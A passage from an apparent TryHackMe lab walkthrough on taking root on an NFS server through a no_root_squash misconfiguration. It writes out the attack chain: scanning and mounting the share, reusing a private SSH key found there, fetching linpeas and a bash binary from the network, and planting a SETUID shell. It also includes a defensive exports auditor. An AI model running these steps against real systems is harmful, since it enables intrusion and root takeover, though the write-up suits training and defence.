Hacking Network File System (NFS) – A TryHackMe Walkthrough

Network File System (NFS) is a file-sharing protocol that lets computers access and share files over a network. Multiple users can work with the same files on a remote system as if they were local files on their own computers. NFS is an important part of many enterprise networks, allowing for easy collaboration and file sharing.

OBJECTIVE

NFS (network file system) is a file system that enables file sharing between computers of different operating systems (Windows/Linux/Mac).

In this practice box from TryHackMe, we will hack into NFS and exploit a misconfiguration (No-root Squash) to obtain root access and find our final root.txt flag.

WHAT IS NO-ROOT SQUASH?

No-root Squash is an uncommon configuration (some might say a misconfiguration) on the NFS file system.

When enabled, it allows a remote user to change permissions on any file in the share and to add the SETUID bit, so that a program effectively runs as the root user. Normally it is disabled to protect against hackers, and all root-created files are assigned to an unprivileged owner named nfsnobody.

👉 Recommended: If you are interested in learning more technical details about how this works, I’d recommend this article on no_root_squash and other configuration options when using NFS.
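A defender's check for the setting described above, as an added example that is not part of the original walkthrough: it parses text in exports(5) syntax and lists every export/client pair where remote root is left unsquashed. The sample export lines, host names and the function name `unsquashed_exports` are constructed for illustration; `all_squash` and quoted paths are assumed absent and are not handled.

```python
import re
import sys

# Constructed sample in exports(5) syntax; not taken from the lab machine.
SAMPLE_EXPORTS = """\
# weak: any client, remote root keeps uid 0
/home        *(rw,sync,no_root_squash)
# corrected: one subnet, root explicitly squashed
/srv/share   10.10.0.0/24(rw,sync,root_squash)
/srv/backup  10.10.0.5(rw,no_root_squash) \\
             10.10.0.0/24(ro)
/srv/pub     -ro,no_root_squash *.example.internal(root_squash) backup.example.internal
"""

# client, optionally followed by (comma-separated options)
CLIENT = re.compile(r"^([^()]*)(?:\(([^()]*)\))?$")

def unsquashed_exports(text):
    """Return (path, client) pairs where remote root is NOT squashed."""
    findings = []
    text = text.replace("\\\n", " ")               # join continuation lines
    for line in text.splitlines():
        fields = line.split("#", 1)[0].split()     # drop comments, tokenize
        if not fields:
            continue
        path, defaults = fields[0], []
        for spec in fields[1:]:
            if spec.startswith("-"):               # "-opt,opt": defaults for this line
                defaults = spec[1:].split(",")
                continue
            m = CLIENT.match(spec)
            if not m:
                continue                           # malformed entry: skip it
            client = m.group(1) or "*"             # "(opts)" alone means any host
            own = (m.group(2) or "").split(",")
            squashed = True                        # root_squash is the default
            for opt in defaults + own:             # later options override earlier
                if opt == "no_root_squash":
                    squashed = False
                elif opt == "root_squash":
                    squashed = True
            if not squashed:
                findings.append((path, client))
    return findings

if __name__ == "__main__":
    # Pass a path such as /etc/exports to audit a real file instead of the sample.
    data = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_EXPORTS
    for path, client in unsquashed_exports(data):
        scope = " (any host)" if client == "*" else ""
        print(f"no_root_squash: {path} -> {client}{scope}")
```

Every pair it prints is a share on which a client's root user can create root-owned SETUID files, so each one should either be narrowed to a trusted host or switched back to `root_squash`.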

ENUMERATION

We’ll start with a standard Nmap scan of all ports with the -p- flag:

nmap $targetIP -p-

The scan shows an nfs service running on port. Let’s find out what directories are mountable with the command:

showmount -e $targetIP

(-e for exports)

Let’s go ahead and mount the /home directory on our attack machine. I’m using a Parrot OS virtual machine with a MATE desktop environment running in GNOME Boxes. We can mount the NFS directory directly to our local filesystem with the command:

mount -t nfs $targetIP:/home /mount

(-t indicates the filesystem type)

And now we can continue further enumeration by poking around the filesystem.

cd /mount
ls -la

In the home directory we find a user folder, cappuccino, and inside it a hidden directory, .ssh. That directory contains an id_rsa file that holds a private SSH key.

INITIAL FOOTHOLD – USER CAPPUCCINO 

After copying the id_rsa file over to our attack machine, we can ssh into cappuccino’s account with this command:

ssh -i id_rsa cappuccino@$targetIP

ENUMERATING PRIVILEGE ESCALATION ATTACK VECTORS WITH LINPEAS

Now that we have our initial foothold, we can grab a copy of the well-known script linpeas.sh from the official git repo and use it to automate the enumeration of attack vectors for privilege escalation on the target machine. We’ll navigate to the /mount folder and use the command wget on our attack machine for this:

sudo wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh 

Before running the script on the target machine, we need to add execute permissions to the file from our attack machine.

The beauty of mounting NFS file systems in Linux is evident here as we can easily add permissions to linpeas.sh from our attack machine to set up the program to be executable on the target machine.

chmod +x linpeas.sh

Now that linpeas.sh is located in the /home folder of the target machine, we can run it to start the automated enumeration:

./linpeas.sh

This will dump a long text file full of details about the target machine. The most interesting things for privilege escalation are highlighted in yellow with red text.

Scrolling through the results, we quickly find the no_root_squash listed under NFS. We will now move forward and exploit this misconfiguration, allowing us to escalate privileges to the root user.

EXPLOITING NO_ROOT_SQUASH

First, let’s grab the bash executable for Ubuntu Server 18.04 from the link on TryHackMe.

sudo wget https://github.com/TheRealPoloMints/Blog/blob/master/Security%20Challenge%20Walkthroughs/Networks%202/bash

Now we add the SETUID bit to the file bash and make it executable. This is the key to gaining root access with no_root_squash.

sudo chmod +sx bash

Running bash now from our target machine doesn’t seem to change us to the root user yet.

./bash

The final trick we need to use is to enable privileged mode with the flag -p.
